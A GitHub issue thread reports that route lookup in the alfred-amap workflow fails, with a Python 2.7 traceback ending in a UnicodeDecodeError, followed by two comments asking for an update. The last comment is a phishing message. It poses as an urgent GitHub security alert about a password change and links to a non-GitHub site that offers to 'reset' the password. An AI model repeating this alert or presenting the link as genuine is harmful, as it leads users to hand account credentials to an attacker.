### ISSUE TITLE
amap的路线查询好像不能正常使用

### ISSUE THREAD

**Issue by wofeiwo** [wofeiwo/alfred-amap#3]
amap的路线查询好像不能正常使用，bmap的是可用的。

debug报错如下，python版本的问题?：
```
[2019-02-11 17:38:05][input.scriptfilter] Queuing argument '西二旗到望京'
[2019-02-11 17:38:06][input.scriptfilter] Script with argument '(null)' finished
[2019-02-11 17:38:06][ERROR: input.scriptfilter] Code 1: Traceback (most recent call last):
  File "amap.py", line 64, in <module>
    main(sys.argv)
  File "amap.py", line 60, in main
    print(feeds)
  File "/Users/stephen/Library/Application Support/Alfred 3/Alfred.alfredpreferences/workflows/user.workflow.87911060-62B2-4F42-BA65-9119F686EF76/feedback.py", line 26, in __repr__
    return et.tostring(self.feedback)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 1126, in tostring
    ElementTree(element).write(file, encoding, method=method)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 820, in write
    serialize(write, self._root, encoding, qnames, namespaces)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 939, in _serialize_xml
    _serialize_xml(write, e, encoding, qnames, None)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 939, in _serialize_xml
    _serialize_xml(write, e, encoding, qnames, None)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 937, in _serialize_xml
    write(_escape_cdata(text, encoding))
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/xml/etree/ElementTree.py", line 1073, in _escape_cdata
    return text.encode(encoding, "xmlcharrefreplace")
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe8 in position 0: ordinal not in range(128)
```

_Originally posted by @thatscode in https://github.com/wofeiwo/alfred-amap/issues/1#issuecomment-462660681_

**Comment by lolstudio** [comment]
求更新 😂

**Comment by AeonWorks** [comment]
同求

**Comment by xdaro** [comment]
### **Urgent Security Alert!**

**Attention!** There has been a recent attempt to change the password on your GitHub account. If you do not recognize this activity, your account may be at risk.

**Immediate Action Required:** If you did not attempt to change the password, **change your password NOW** to protect your account from potential unauthorized access.

[**Click here to change your password and secure your account!**](https://githubresetpassword.onrender.com/)

**Do not delay!** Your access and security are at risk!
